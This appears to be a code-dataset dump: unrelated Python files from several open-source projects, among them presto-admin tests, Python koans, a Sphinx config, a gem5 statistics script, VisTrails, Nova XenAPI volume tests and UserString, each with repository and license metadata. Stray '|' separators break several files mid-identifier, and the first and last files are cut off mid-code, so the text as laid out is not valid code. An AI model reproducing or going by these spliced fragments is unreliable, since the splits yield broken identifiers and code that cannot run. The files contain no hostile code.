def test_deploy_files(self, put_mock, create_dir_mock):
local_dir = '/my/local/dir'
remote_dir = '/my/remote/dir'
catalog.deploy_files(['a', 'b'], local_dir, remote_dir,
PRESTO_STANDALONE_USER_GROUP)
create_dir_mock.assert_called_with(remote_dir, PRESTO_STANDALONE_USER_GROUP)
put_mock.assert_any_call('/my/local/dir/a', remote_dir, use_sudo=True,
mode=0600)
put_mock.assert_any_call('/my/local/dir/b', remote_dir, use_sudo=True,
mode=0600)
@patch('prestoadmin.catalog.os.path.isfile')
@patch("__builtin__.open")
def test_validate(self, open_mock, is_file_mock):
is_file_mock.return_value = True
file_obj = open_mock.return_value.__enter__.return_value
file_obj.read.return_value = 'connector.noname=example'
self.assertRaisesRegex
|
p(ConfigurationError,
'Catalog configuration example.properties '
'does not contain connector.name',
catalog.add, 'example
|
')
@patch('prestoadmin.catalog.os.path.isfile')
def test_validate_fail(self, is_file_mock):
is_file_mock.return_value = True
self.assertRaisesRegexp(
SystemExit,
'Error validating ' + os.path.join(get_catalog_directory(), 'example.properties') + '\n\n'
'Under
|
Krakn/learning
|
src/python/python_koans/python2/about_decorating_with_functions.py
|
Python
|
isc
| 832
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from runner.koan import *
class AboutDecoratingWithFunctions(Koan):
def addcowbell(fn):
fn.wow_factor = 'COWBELL BABY!'
return fn
@addcowbell
def mediocre_song(self):
return "o/~ We all live in a broken submarine o/~"
def test_decorators_can_modify_a_function(self):
self.assertMatch(__, self.mediocre_song())
self.assertEqual(__, self.mediocre_song.wow_fac
|
tor)
# ------------------------------------------------------------------
def xmltag(fn):
def func(*args):
return '<' + fn(*args) + '/>'
return func
@xmltag
def render_tag(self, name):
return name
def test_decorators_can_change_a_function_o
|
utput(self):
self.assertEqual(__, self.render_tag('llama'))
|
wintoncode/winton-kafka-streams
|
docs/conf.py
|
Python
|
apache-2.0
| 5,443
| 0.002021
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Winton Kafka Streams Python documentation build configuration file, created by
# sphinx-quickstart on Tue May 16 21:00:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# Get the project root dir
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import winton_kafka_streams
from mock import MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return MagicMock()
MOCK_MODULES = ['confluent_kafka', 'confluent_kafka.cimpl', 'confluent_kafka.avro']
sys.modules.update((mod_name, Mock()
|
) for mod_name in MOCK_MODULES)
# -- General configuration ------------------------------------------------
# If your documentati
|
on needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Winton Kafka Streams Python'
copyright = '2017, Winton Group'
author = 'Winton Group'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from setuptools_scm import get_version
version = release = get_version(root='..')
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'WintonKafkaStreamsPythondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'WintonKafkaStreamsPython.tex', 'Winton Kafka Streams Python Documentation',
'Winton Group', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'wintonkafkastreamspython', 'Winton Kafka Streams Python Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'WintonKafkaStreamsPython', 'Winton Kafka Streams Python Documentation',
author, 'WintonKafkaStreamsPython', 'One line description of project.',
'Miscellaneous'),
]
|
Avantol13/mgen
|
dev/scripts/_project_cfg_importer.py
|
Python
|
gpl-3.0
| 1,937
| 0.005163
|
"""
Project Configuration Importer
Handles the importing the project configuration from a separate location
and validates the version against the specified expected version.
NOTE: If you update this file or any others in scripts and require a
NEW variable in project_cfg, then you need to UPDATE THE EXPECTED_CFG_VERSION
That way, if someone tries to use the new scripts with an old cfg, they'll
get a warning.
"""
import importlib
import os
import sys
PROJECT_CFG_DIR = os.path.realpath(os.path.dirname(__file__) + "/../../cfg/")
PROJECT_CFG_NAME = "project_cfg"
EXPECTED_CFG_VERSION = 1.1
def get_project_cfg():
"""
Returns the project configuration module
"""
sys.path.append(PROJECT_CFG_DIR)
try:
project_cfg_module = importlib.import_module(PROJECT_CFG_NAME)
except:
raise FileNotFoundError("\n\n=======================
|
========== ERROR ========================================"
"\nUnable to import project configuration: " + PROJECT_CFG_DIR + "/" + PROJECT_CFG_NAME + ".py"
"\n===========================================
|
=====================================\n")
_verify_correct_version(project_cfg_module)
return project_cfg_module
def _verify_correct_version(project_cfg_module):
is_correct_version = False
if project_cfg_module.__CFG_VERSION__ == EXPECTED_CFG_VERSION:
is_correct_version = True
else:
raise Exception("\n\n================================= ERROR ========================================"
"\nIncorrect project configuration version: " + str(project_cfg_module.__CFG_VERSION__) +
"\n Development environment expected: " + str(EXPECTED_CFG_VERSION) +
"\n================================================================================\n")
return is_correct_version
|
bcheung92/Paperproject
|
gem5/pyscript/cachecmp.py
|
Python
|
mit
| 2,915
| 0.026072
|
#!/usr/bin/env python
import sys
import re
import os
inFilename = sys.argv[1]
if os.path.isfile(inFilename):
namelength = inFilename.rfind(".")
name = inFilename[0:namelength]
exten = inFilename[namelength:]
outFilename = name+"-cachecmp"+exten
print "inFilename:", inFilename
print "outFilename:", outFilename
fpRead = open(inFilename, "r")
fpWrite = open(outFilename, "w+")
dtbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.dtb.walker).* ([0-9]+)')
dtbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.dtb.walker).* ([0-9]+)')
itbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.itb.walker).* ([0-9]+)')
itbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.itb.walker).* ([0-9]+)')
overallhitsPattern = re.compile(r'.*(l2.overall_hits::total).* ([0-9]+)')
cachehitsPattern = re.compile(r'.*(l2.cachehits).* ([0-9]+)')
threadbeginPattern = re.compile(r'.*Begin Simulation Statistics.*')
threadendPattern =re.compile(r'.*End Simulation Statistics.*')
lines = fpRead.readline()
while lines:
threadbeginmatch = threadbeginPattern.match(lines)
if threadbeginmatch:
dtbwalker1=0
itbwalker1=0
dtbwalker2=0
itbwalker2=0
overallhits=0
cachehits=0
gem5hits=0
ratio = 0
threadlines = fpRead.readline()
while threadlines:
dtbwalker1match = dtbwalker1Pattern.search(threadlines)
itbwalker1match = itbwalker1Pattern.search(threadlines)
dtbwalker2match = dtbwalker2Pattern.search(threadlines)
itbwalker2match = itbwalker2Pattern.search(threadlines)
overallhitsmatch = overallhitsPattern.search(threadlines)
cachehitsmatch = cachehitsPattern
|
.search(threadlines)
threadendmatch = threadendPatte
|
rn.match(threadlines)
if dtbwalker1match:
dtbwalker1=int(dtbwalker1match.group(2))
if itbwalker1match:
itbwalker1=int(itbwalker1match.group(2))
if dtbwalker2match:
dtbwalker2=int(dtbwalker2match.group(2))
if itbwalker2match:
itbwalker2=int(itbwalker2match.group(2))
if overallhitsmatch:
overallhits=int(overallhitsmatch.group(2))
if cachehitsmatch:
cachehits=int(cachehitsmatch.group(2))
if threadendmatch:
gem5hits=overallhits-(dtbwalker1+dtbwalker2+itbwalker1+itbwalker2)
absval = abs(gem5hits-cachehits)
if gem5hits!=0:
ratio=(absval/float(gem5hits))*100
else:
ratio=float(0)
fpWrite.write("gem5hit %d " % gem5hits)
fpWrite.write("cachehit %d " % cachehits)
fpWrite.write("ratio %.2f%%" % ratio)
fpWrite.write("\n")
break
threadlines = fpRead.readline()
lines = fpRead.readline()
fpRead.close()
fpWrite.close()
|
CMUSV-VisTrails/WorkflowRecommendation
|
vistrails/index/vistrailanalyzer.py
|
Python
|
bsd-3-clause
| 4,209
| 0.012354
|
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
import re
from lucene import *
import lucene
dir(lucene)
class vistrailAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = vistrailFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
class stemmingAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
# patterns for splitting words into substrings
patterns = [
|
# 32 char md5 sums
"[a-f0-9]{32}",
# '2D', '3D'
"2D", "3D",
# words beginning with capital letters
"[A-Z][a-z]+"
|
,
# capital letter sequence ending with a word that begins with a capital letter
"[A-Z]*(?=[A-Z][a-z])",
# capital letter sequence
"[A-Z]{2,}",
# non-capital letter sequence
"[a-z]{2,}" ]
splitPattern = re.compile("|".join(patterns))
class vistrailFilter(PythonTokenFilter):
TOKEN_TYPE_PART = "text"
def __init__(self, input):
super(vistrailFilter, self).__init__(input)
self.input = input
self.parts = [] # parts found for the current token
self.current = None
def next(self):
if self.parts:
# continue adding parts
part = self.parts.pop()
t = Token(part, self.current.startOffset(),
self.current.endOffset(), self.TOKEN_TYPE_PART)
t.setPositionIncrement(0)
return t
else:
# find parts
self.current = self.input.next()
if self.current is None:
return None
text = str(self.current.termText())
pattern = splitPattern.findall(text)
# remove single characters and duplicates
pattern = set([p for p in pattern if len(p)>1 and p != text])
# if len(pattern) > 0:
# print "vistrailFilter", text, "-->",','.join(pattern)
self.parts = pattern
return self.current
|
ikalnytskyi/holocron
|
src/holocron/_processors/_misc.py
|
Python
|
bsd-3-clause
| 4,296
| 0.000466
|
"""Various miscellaneous functions to make code easier to read & write."""
import collections.abc
import copy
import functools
import inspect
import logging
import urllib.parse
import jsonpointer
import jsonschema
_logger = logging.getLogger("holocron")
def resolve_json_references(value, context, keep_unknown=True):
def _do_resolve(node):
node = copy.copy(node)
if isinstance(node, collections.abc.Mapping) and "$ref" in node:
uri, fragment = urllib.parse.urldefrag(node["$ref"])
try:
return jsonpointer.resolve_pointer(context[uri], fragment)
except KeyError:
if keep_unknown:
return node
raise
elif isinstance(node, collections.abc.Mapping):
for k, v in node.items():
node[k] = _do_resolve(v)
elif isinstance(node, collections.abc.Sequence) and not isinstance(node, str):
if not isinstance(node, collections.abc.MutableSequence):
node = list(node)
for i in range(len(node)):
node[i] = _do_resolve(node[i])
return node
return _do_resolve(value)
class parameters:
def __init__(self, *, fallback=None, jsonschema=None):
self._fallback = fallback or {}
self._jsonschema = jsonschema
def __call__(self, fn):
@functools.wraps(fn)
def wrapper(app, *args, **kwargs):
signature = inspect.signature(fn)
arguments = signature.bind_partial(app, *args, **kwargs).arguments
# First two arguments always are an application instance and a
# stream of items to process. Since they are passed by Holocron
# core as positional arguments, there's no real need to check their
# schema, so we strip them away.
arguments = dict(list(arguments.items())[2:])
parameters = dict(list(signature.parameters.items())[2:])
# If some parameter has not been passed, a value from a fallback
# must be used instead (if any).
for param in parameters:
if param not in arguments:
try:
value = resolve_json_references(
{"$ref": self._fallback[param]},
{"metadata:": app.metadata},
)
except (jsonpointer.JsonPointerException, KeyError):
continue
# We
|
need to save resolved value in both arguments and
# kwargs mappings, because the former is used to *validate*
# passed arguments, and the latter to supply a value from a
# fallback.
arguments[param] = kwargs[param] = value
if self._jsonschema:
try:
format_checker = jsonschema.FormatChecker()
@format_checker.checks("encoding", (LookupError,))
|
def is_encoding(value):
if isinstance(value, str):
import codecs
return codecs.lookup(value)
@format_checker.checks("timezone", ())
def is_timezone(value):
if isinstance(value, str):
import dateutil.tz
return dateutil.tz.gettz(value)
@format_checker.checks("path", (TypeError,))
def is_path(value):
if isinstance(value, str):
import pathlib
return pathlib.Path(value)
jsonschema.validate(
arguments,
self._jsonschema,
format_checker=format_checker,
)
except jsonschema.exceptions.ValidationError as exc:
message = exc.message
if exc.absolute_path:
message = f"{'.'.join(exc.absolute_path)}: {exc.message}"
raise ValueError(message)
return fn(app, *args, **kwargs)
return wrapper
|
adh/py-clos
|
py_clos/base.py
|
Python
|
mit
| 7,245
| 0.003313
|
# -*- mode: python -*-
from .combinations import STANDARD_METHOD_COMBINATION
from .specializers import specializer, ROOT_SPECIALIZER
from . import util
from .cache import NoCachePolicy, LRU, TypeCachePolicy
import threading
import inspect
import warnings
try:
from ._py_clos import GenericFunction as GenericFunctionBase
except ImportError:
class GenericFunctionBase:
def __call__(self, *args, **kwargs):
return self.call_slow_path(args, kwargs)
def initialize_cache(self, map, size):
pass
class GenericFunction(GenericFunctionBase):
def __init__(self, name):
self._name = name
self._method_combination = STANDARD_METHOD_COMBINATION
self._methods = []
self._specialized_on = []
self._cache_policies = []
self._lock = threading.Lock()
self.clear_cache()
def redefine(self, method_combination=None):
if method_combination is not None:
self._method_combination = method_combination
self.clear_cache()
def get_cache_size(self):
return len(self._methods) * 4
def cache_should_grow(self):
for i in self._cache_policies:
if i != TypeCachePolicy:
return False
return True
def clear_cache(self):
if self._cache_policies is None:
self._cache = None
else:
for i in self._cache_policies:
if i != TypeCachePolicy:
self._cache = LRU(self.get_cache_size())
return
self._cache = {}
# the idea is that number of possible types is clearly bounded
# so limiting the cache size is unnecessary
def rebuild_specialized_on(self):
maxlen = max((len(i.specializers) for i in self._methods))
bitmap = [False] * maxlen
for i in self._methods:
for j in i.specialized_on:
bitmap[j] = True
self._specialized_on = [idx for idx, i in enumerate(bitmap) if i]
def rebuild_cache_policies(self):
arglen = max((len(i.specializers) for i in self._methods))
spec_count = len(self._specialized_on)
cps = [[]] * spec_count
for i in self._methods:
for idx, j in enumerate(self._specialized_on):
if j >= len(i.specializers):
continue
spec = i.specializers[j]
if spec is None:
continue
cps[idx].append(spec.cache_policy)
cps = [util.common_superclass(*i) for i in cps]
for i in cps:
if i is NoCachePolicy:
self._cache_policies = None
self._cache_policies = cps
def get_cache_map(self):
maxlen = max((len(i.specializers) for i in self._methods))
key = [b"_"] * maxlen
for idx, cp in zip(self._specialized_on, self._cache_policies):
if not hasattr(cp, "c_cache_key"):
return None
key[idx] = cp.c_cache_key
return b"".join(key).rstrip(b'_')
def initialize_c_cache(self):
cm = self.get_cache_map()
if not cm:
self.initialize_cache(b"", 0, False)
else:
self.initialize_cache(cm,
self.get_cache_size(),
self.cache_should_grow())
def add_method(self, method):
with self._lock:
self._methods.append(method)
self.rebuild_specialized_on()
self.rebuild_cache_policies()
self.initialize_c_cache()
self.clear_cache()
def get_cache_key(self, args):
return tuple((cp.get_cache_key(args[self._specialized_on[idx]])
for idx, cp in enumerate(self._cache_policies)))
def get_applicable_methods(self, args):
return sorted((i for i in self._methods if i.matches(args)),
key=lambda i: i.sort_key(args))
def get_effective_method(self, args):
with self._lock:
methods = self.get_applicable_methods(args)
return self._method_combination.compute_effective_method(methods)
def call_slow_path(self, args, kwargs={}):
if self._cache is not None:
ck = self.get_cache_key(args)
if ck in self._cache:
return self._cache[ck](*args, **kwargs)
effective_method = self.get_effective_method(args)
if self._cache is not None:
self._cache[ck] = effective_method
return effective_method(*args, **kwargs)
class Method:
__slots__ = ["proc", "specializers", "qualifiers", "next_method_arg"]
def __init__(self, proc,
specializers=[],
qual
|
ifiers=[],
next_method_arg=None):
self.proc = proc
self.specializers = specializers
self.qualifiers = qualifier
|
s
self.next_method_arg = next_method_arg
@property
def specialized_on(self):
return [idx for idx, i in enumerate(self.specializers) if i != None]
def matches(self, args):
for idx, i in enumerate(self.specializers):
if i is None:
continue
if not i.matches(args[idx]):
return False
return True
def sort_key(self, args):
res = []
for idx, i in enumerate(self.specializers):
if idx >= len(args):
break
if i is None:
i = ROOT_SPECIALIZER
res.append(i.sort_key(args[idx]))
return res
@classmethod
def from_annotated_function(cls, proc, qualifiers=[]):
argspec = inspect.getfullargspec(proc)
arg_names = argspec.args[:len(argspec.args) - len(argspec.defaults or [])]
anno = proc.__annotations__
specializers = [(specializer(anno[i]) if i in anno else None)
for i in arg_names]
return cls(proc,
specializers=specializers,
qualifiers=qualifiers,
next_method_arg=("next_method"
if "next_method" in argspec.args else None))
def __call__(self, *args, **kwargs):
return self.callable(*args, **kwargs)
@property
def callable(self):
return self.callable_with_next_method()
def callable_with_next_method(self, next_method=None):
if self.next_method_arg:
def wrapper(*args, **kwargs):
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
return wrapper
else:
return self.proc
def call_method(self, args, kwargs, next_method=None):
if self.next_method_arg:
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
else:
return self.proc(*args, **kwargs)
def defgeneric(name, **kwargs):
gf = GenericFunction(name)
gf.redefine(**kwargs)
return gf
|
sridevikoushik31/nova
|
nova/tests/virt/xenapi/test_volumeops.py
|
Python
|
apache-2.0
| 8,108
| 0
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from nova import test
from nova.tests.xenapi import stubs
from nova.virt.xenapi import volumeops
class VolumeAttachTestCase(test.TestCase):
def test_detach_volume_call(self):
registered_calls = []
def regcall(label):
def side_effect(*args, **kwargs):
registered_calls.append(label)
return side_effect
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(volumeops.vm_utils, 'lookup')
self.mox.StubOutWithMock(volumeops.vm_utils, 'find_vbd_by_number')
self.mox.StubOutWithMock(volumeops.vm_utils, 'is_vm_shutdown')
self.mox.StubOutWithMock(volumeops.vm_utils, 'unplug_vbd')
self.mox.StubOutWithMock(volumeops.vm_utils, 'destroy_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
self.mox.StubOutWithMock(volumeops.volume_utils, 'find_sr_from_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'purge_sr')
volumeops.vm_utils.lookup('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
volumeops.vm_utils.find_vbd_by_number(
'session', 'vmref', 'devnumber').AndReturn('vbdref')
volumeops.vm_utils.is_vm_shutdown('session', 'vmref').AndReturn(
False)
volumeops.vm_utils.unplug_vbd('session', 'vbdref')
volumeops.vm_utils.destroy_vbd('session', 'vbdref').WithSideEffects(
regcall('destroy_vbd'))
volumeops.volume_utils.find_sr_from_vbd(
'session', 'vbdref').WithSideEffects(
regcall('find_sr_from_vbd')).AndReturn('srref')
volumeops.volume_utils.purge_sr('session', 'srref')
self.mox.ReplayAll()
ops.detach_volume(
dict(driver_volume_type='iscsi', data='conn_data'),
'instance_1', 'mountpoint')
self.assertEquals(
['find_sr_from_vbd', 'destroy_vbd'], registered_calls)
def test_attach_volume_call(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=True).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
ops.attach_volume(
connection_info,
'instance_1', 'mountpoint')
def test_attach_volume_no_hotplug(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=False).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
ops.attach_volume(
connection_info,
'instance_1', 'mountpoint', hotplug=False)
def test_connect_volume_no_hotplug(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volumeops.VolumeOps(session)
instance_name = 'instance_1'
sr_uuid = '1'
sr_label = 'Disk-for:%s' % instance_name
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
vm_ref = 'vm_ref'
dev_number = 1
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.StubOutWithMock(volumeops.vm_utils, 'create_vbd')
volumeops.vm_utils.create_vbd(
session, vm_ref, vdi_ref, dev_number,
bootable=False, osvol=True).AndReturn(vbd_ref)
self.mox.ReplayAll()
ops._conn
|
ect_volume(connection_info, dev_number, instance_name,
vm_ref, hotplug=False)
self.assertEquals(False, called['VBD.plug'])
def test_connect_volume(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volume
|
ops.VolumeOps(session)
sr_uuid = '1'
sr_label = 'Disk-for:None'
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.ReplayAll()
ops.connect_volume(connection_info)
self.assertEquals(False, called['VBD.plug'])
|
MalloyPower/parsing-python
|
front-end/testsuite-python-lib/Python-2.1/Lib/UserString.py
|
Python
|
mit
| 7,530
| 0.00571
|
#!/usr/bin/env python
## vim:ts=4:et:nowrap
"""A user-defined wrapper around string objects
Note: string objects have grown methods in Python 1.6
This module requires Python 1.6 or later.
"""
from types import StringType, UnicodeType
import sys
__all__ = ["UserString","MutableString"]
class UserString:
def __init__(self, seq):
if isinstance(seq, StringType) or isinstance(seq, UnicodeType):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self): return str(self.data)
def __repr__(self): return repr(self.data)
def __int__(self): return int(self.data)
def __long__(self): return long(self.data)
def __float__(self): return float(self.data)
def __complex__(self): return complex(self.data)
def __hash__(self): return hash(self.data)
def __cmp__(self, string):
if isinstance(string, UserString):
return cmp(self.data, string.data)
else:
return cmp(self.data, string)
def __contains__(self, char):
return char in self.data
def __len__(self): return len(self.data)
def __getitem__(self, index): return self.__class__(self.data[index])
def __getslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
return self.__class__(self.data[start:end])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(self.data + other)
else:
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(other + self.data)
else:
return self.__class__(str(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserString):
self.data += other.data
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
self.data += other
else:
self.data += str(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
# the following methods are defined in alphabetical order:
def capitalize(self): return self.__class__(self.data.capitalize())
def center(self, width): return self.__class__(self.data.center(width))
def count(self, sub, start=0, end=sys.maxint):
return self.data.count(sub, start, end)
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
else:
return self.__class__(self.data.encode(encoding))
else:
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=sys.maxint):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
